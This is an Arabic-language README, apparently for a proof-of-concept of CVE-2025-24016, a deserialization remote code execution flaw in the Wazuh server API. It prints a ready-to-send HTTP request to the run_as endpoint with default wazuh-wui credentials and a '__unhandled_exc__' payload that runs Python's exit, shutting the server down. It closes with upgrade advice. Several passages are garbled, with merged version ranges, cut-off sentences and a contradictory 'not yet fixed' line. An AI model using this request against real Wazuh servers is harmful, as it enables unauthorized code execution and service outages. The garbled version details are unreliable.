
CVE-2025-24016: RCE في خادم Wazuh! تنفيذ التعليمات البرمجية عن بُعد
يعرض هذا المستودع ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في خادم Wazuh، الناتجة عن إلغاء تسلسل غير آمن في حزمة wazuh-manager. تسمح الثغرة للمهاجمين عن بُعد الذين لديهم وصول إلى API (لوحة تحكم مخترقة، أو خوادم Wazuh في الكتلة، أو بعض الإعدادات التي تتضمن وكلاء مخترقين) بتنفيذ تعليمات برمجية عشوائية على الخادم.
wazuh-manager >= 4.4.0>= 4.9.1تحدث الثغرة في واجهة برمجة تطبيقات Wazuh، حيث يتم تسلسل المعاملات في DistributedAPI بصيغة JSON وإلغاء تسلسلها باستخدام as_wazuh_object في ملف framework/wazuh/core/cluster/common.py. يمكن للمهاجم استغلال هذه الثغرة عن طريق حقن قاموس غير معقّم في طلبات DAPI، مما قد يؤدي إلى تنفيذ تعليمات برمجية عشوائية بلغة Python.
يمكن تشغيل الثغرة باستخدام نقطة النهاية run_as، والتي تسمح للمهاجم بالتحكم في وسيط auth_context. من خلال صياغة طلب خبيث، يمكن تنفيذ تعليمات برمجية عشوائية على الخادم الرئيسي.
لتشغيل هذه الثغرة باستخدام واجهة برمجة تطبيقات الخادم، اتبع الخطوات التالية.
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}

wazuh-wui:MyS3cr37P450r.*-).__unhandled_exc__ الذي يؤدي إلى تنفيذ تعليمات برمجية عشوائية بلغة Python (exit في هذه الحالة).>= 4.4.0 حتى 4.9.0 (لم يتم إصلاحها بعد).exit، مما يؤدي إلى إيقاف تشغيل خادم Wazuh.لحماية أنظمتك، قم بترقية Wazuh إلى الإصدار >= 4.9.1 حيث تم إصلاح هذه المشكلة.